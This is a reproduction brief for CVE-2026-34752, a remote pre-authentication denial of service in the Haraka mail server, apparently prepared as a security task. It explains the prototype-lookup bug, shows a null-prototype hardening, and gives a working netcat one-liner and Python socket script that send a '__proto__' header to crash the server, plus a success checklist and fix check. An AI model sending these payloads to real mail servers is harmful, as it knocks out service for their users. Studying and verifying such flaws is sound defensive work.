# CVE-2026-34752

## Summary

Haraka Mail Server DoS via __proto__ prototype pollution in email headers

## Description

## OBJECTIVE: Reproduce Denial of Service via Prototype Pollution

This is not a crash to ignore: it is a **remote, pre-authentication DoS**. Any client that can reach the SMTP listener can trigger it with no credentials, and it affects a production mail server used by thousands of organizations.

## VULNERABILITY DETAILS

### Root Cause
In `node_modules/haraka-email-message/lib/header.js:215-218`, headers are stored in a plain `{}` object literal, which inherits from `Object.prototype`:

```javascript
_add_header(key, value, method) {
    this.headers[key] ??= []          // line 216
    this.headers[key][method](value)  // line 217
}
```

When `key` is `__proto__` (with `method` being the array method to call, `push` here):
1. `this.headers['__proto__']` resolves through the prototype chain to `Object.prototype`
2. `Object.prototype` is not null/undefined, so the `??=` assignment is skipped
3. `Object.prototype[method]` is `undefined`, so the call throws `TypeError: this.headers[key][method] is not a function`
4. The exception is uncaught, and Haraka's handler in `haraka.js:26-33` calls `process.exit(1)`

Note that nothing is written to `Object.prototype` along this path; the impact is the uncaught `TypeError`, not a polluted prototype.
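The failure mode in isolation, as an added example that is not Haraka's or haraka-email-message's code: a header store with the same `_add_header` shape as the snippet above, beside a hardened variant backed by a null-prototype object (my change for illustration, not the upstream fix shipped in 3.1.4). It also probes other `Object.prototype` names (`constructor`, `toString`, `hasOwnProperty`), which the same lookup resolves to non-nullish inherited values without a `push` method; whether the real parser's key handling lets those names through, and whether 3.1.4 covers them, is not stated on the page and is worth checking when verifying the fix. The payload bytes and the name list are constructed for the demo.

```javascript
// Added example, not code from Haraka or haraka-email-message: a header store
// with the same _add_header shape as the snippet above, beside a hardened
// variant, so the failure mode can be reproduced with `node` alone.
// Key normalization done by the real parser (e.g. lowercasing) is not
// reproduced; it changes which names reach the store, not the __proto__ case.

// Vulnerable shape: a plain {} inherits from Object.prototype. A key such as
// "__proto__" resolves to an inherited value that is not nullish, so ??= is
// skipped, and that value has no push method, so the call throws.
class VulnerableHeaders {
  constructor () { this.headers = {} }
  _add_header (key, value, method) {
    this.headers[key] ??= []
    this.headers[key][method](value)
  }
  add_end (key, value) { this._add_header(key, value, 'push') }
  get_all (key) { return this.headers[key] ?? [] }
}

// Hardened shape (my change for illustration, not the upstream fix): a
// null-prototype object has no inherited properties, so every key, including
// "__proto__", becomes an own data property and ??= behaves as intended.
class HardenedHeaders extends VulnerableHeaders {
  constructor () {
    super()
    this.headers = Object.create(null)
  }
}

// Feed a constructed raw header block (CRLF "Name: value" lines, no folding)
// into a fresh store. The TypeError is caught and reported here; inside
// Haraka it is uncaught and ends in process.exit(1).
function loadHeaders (StoreClass, rawHeaders) {
  const store = new StoreClass()
  try {
    for (const line of rawHeaders.split('\r\n')) {
      const idx = line.indexOf(':')
      if (idx < 1) continue // blank or malformed line
      store.add_end(line.slice(0, idx), line.slice(idx + 1).trim())
    }
    return { crashed: false, store, error: null }
  } catch (err) {
    return { crashed: true, store: null, error: `${err.constructor.name}: ${err.message}` }
  }
}

// Constructed inputs: the header block from the page's PoC, and other
// Object.prototype names whose inherited values are likewise non-nullish
// and lack a push method.
const PAGE_PAYLOAD = 'From: x@x.com\r\n__proto__: crash\r\n'
const INHERITED_NAMES = ['__proto__', 'constructor', 'toString', 'hasOwnProperty']

// Return the names from `names` that crash a given store class.
function crashingNames (StoreClass, names = INHERITED_NAMES) {
  return names.filter(name => loadHeaders(StoreClass, `${name}: x\r\n`).crashed)
}

// Stand-alone run: node headers_demo.js
const vuln = loadHeaders(VulnerableHeaders, PAGE_PAYLOAD)
console.log('plain {} store crashed:', vuln.crashed, vuln.error)
const hard = loadHeaders(HardenedHeaders, PAGE_PAYLOAD)
console.log('null-prototype store crashed:', hard.crashed,
  '| stored __proto__ header:', hard.store.get_all('__proto__'),
  '| prototype still null:', Object.getPrototypeOf(hard.store.headers) === null)
console.log('inherited names crashing plain {}:', crashingNames(VulnerableHeaders))
console.log('inherited names crashing null-prototype:', crashingNames(HardenedHeaders))
```

A `Map` keyed by header name is the other common hardening; the null-prototype object is shown because it is the smallest change to the snippet's shape. Either way, confirm after the fix that a stored `__proto__` header lands as ordinary data (the store's prototype is unchanged) rather than being silently dropped or treated as a prototype assignment.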

### Impact
- **Single-process mode**: Entire server crashes and STAYS DOWN
- **Cluster mode**: Worker dies, sessions lost, availability disrupted
- **CVSS 4.0**: 8.7/10 (High severity)

## REPRODUCTION STEPS

```bash
# 1. Install vulnerable version
npm install -g Haraka@3.1.3

# 2. Initialize config
haraka -i /tmp/haraka_test
cd /tmp/haraka_test

# 3. Start server (default port 2525)
haraka -c .

# 4. Send malicious email (in another terminal)
(echo "EHLO attacker"; 
 echo "MAIL FROM:<attacker@evil.com>"; 
 echo "RCPT TO:<victim@localhost>"; 
 echo "DATA"; 
 echo "From: attacker@evil.com"; 
 echo "__proto__: crash"; 
 echo ""; 
 echo "Crash payload"; 
 echo "."; 
 echo "QUIT") | nc localhost 2525

# 5. EXPECTED RESULT: Haraka worker process crashes, process exits with code 1
```

## Python PoC (from the advisory)
```python
import socket

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("127.0.0.1", 2525))
sock.recv(4096)  # 220 banner
sock.sendall(b"EHLO evil\r\n"); sock.recv(4096)
sock.sendall(b"MAIL FROM:<x@x.com>\r\n"); sock.recv(4096)
sock.sendall(b"RCPT TO:<user@haraka.local>\r\n"); sock.recv(4096)
sock.sendall(b"DATA\r\n"); sock.recv(4096)  # 354 go ahead
# Header block carrying the trigger, then a body and the end-of-data marker
sock.sendall(b"From: x@x.com\r\n__proto__: crash\r\n\r\nbody\r\n.\r\n")
# Server crashes here: a vulnerable server closes the socket instead of
# answering 250, so recv() returns b"" or raises ConnectionResetError
try:
    print(sock.recv(4096))
except ConnectionResetError:
    print("connection reset by peer")
sock.close()
```

## SUCCESS CRITERIA
- [ ] Server accepts SMTP connections initially
- [ ] Server processes normal email without issues
- [ ] Sending `__proto__:` header causes immediate crash
- [ ] Process exits with code 1 (visible in logs/terminal)
- [ ] Server becomes unavailable (DoS achieved)

## FIX VERIFICATION (Version 3.1.4+)
After upgrading to 3.1.4, the same payload should be handled without the process exiting: the DATA phase completes with a normal SMTP response (accept or reject), and a fresh connection afterwards still receives the banner.

## REFERENCES
- GitHub Advisory: https://github.com/haraka/Haraka/security/advisories/GHSA-xph3-r2jf-4vp3
- Fix Release: https://github.com/haraka/Haraka/releases/tag/v3.1.4
- CVE: https://www.cve.org/CVERecord?id=CVE-2026-34752

## Metadata

- Product: Haraka Mail Server
- Severity: high
- Status: open
